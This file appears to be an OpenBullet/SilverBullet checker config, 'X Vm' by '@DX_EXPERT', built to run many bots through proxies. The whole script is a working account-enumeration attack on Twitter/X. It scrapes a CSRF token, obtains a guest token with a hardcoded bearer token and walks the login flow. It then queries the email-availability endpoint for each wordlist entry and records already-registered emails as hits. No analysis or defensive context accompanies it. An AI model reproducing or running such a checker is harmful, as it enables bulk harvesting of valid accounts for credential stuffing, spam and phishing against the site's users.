[SETTINGS]
{
  "Name": "X Vm",
  "SuggestedBots": 75,
  "MaxCPM": 0,
  "LastModified": "2025-01-03T11:22:28.4380245+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@DX_EXPERT",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "X Vm",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#DONT_EDIT REQUEST GET "https://twitter.com/account/begin_password_reset" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#DONT_EDIT PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"authenticity_token\" value=\"" "\">" -> VAR "DX" 

#DONT_EDIT REQUEST POST "https://api.twitter.com/1.1/guest/activate.json" 
  CONTENT "" 
  CONTENTTYPE "application/json" 
  HEADER "accept: application/json" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "content-type: application/json" 
  HEADER "origin: https://auth.uber.com" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36" 
  HEADER "x-csrf-token: <DX>" 
  HEADER "authorization: Bearer AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs%3D1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA" 

#DONT_EDIT PARSE "<SOURCE>" JSON "guest_token" -> VAR "EXPERT" 

#DONT_EDIT REQUEST POST "https://twitter.com/i/api/1.1/onboarding/task.json?flow_name=login" 
  CONTENT "{\"input_flow_data\":{\"flow_context\":{\"debug_overrides\":{},\"start_location\":{\"location\":\"splash_screen\"}}},\"subtask_versions\":{\"contacts_live_sync_permission_prompt\":0,\"email_verification\":1,\"topics_selector\":1,\"wait_spinner\":1,\"cta\":4}}" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "authorization: Bearer AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs%3D1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA" 
  HEADER "content-type: application/json" 
  HEADER "origin: https://twitter.com" 
  HEADER "referer: https://twitter.com/i/flow/login" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36" 
  HEADER "x-csrf-token: <DX>" 
  HEADER "x-guest-token: <EXPERT>" 
  HEADER "x-twitter-active-user: yes" 
  HEADER "x-twitter-client-language: en" 

#DONT_EDIT PARSE "<SOURCE>" JSON "flow_token" -> VAR "DX EXPERT" 

#DONT_EDIT REQUEST GET "https://twitter.com/i/api/i/users/email_available.json?email=<USER>" 
  
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "authorization: Bearer AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs%3D1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA" 
  HEADER "referer: https://twitter.com/i/flow/signup" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36" 
  HEADER "x-csrf-token: <DX>" 
  HEADER "x-guest-token: <EXPERT>" 
  HEADER "x-twitter-active-user: yes" 
  HEADER "x-twitter-client-language: en" 

#DONT_EDIT KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Email has already been taken." 
    KEY "taken\":true" 
  KEYCHAIN Failure OR 
    KEY "Available!" 
    KEY "taken\":false" 

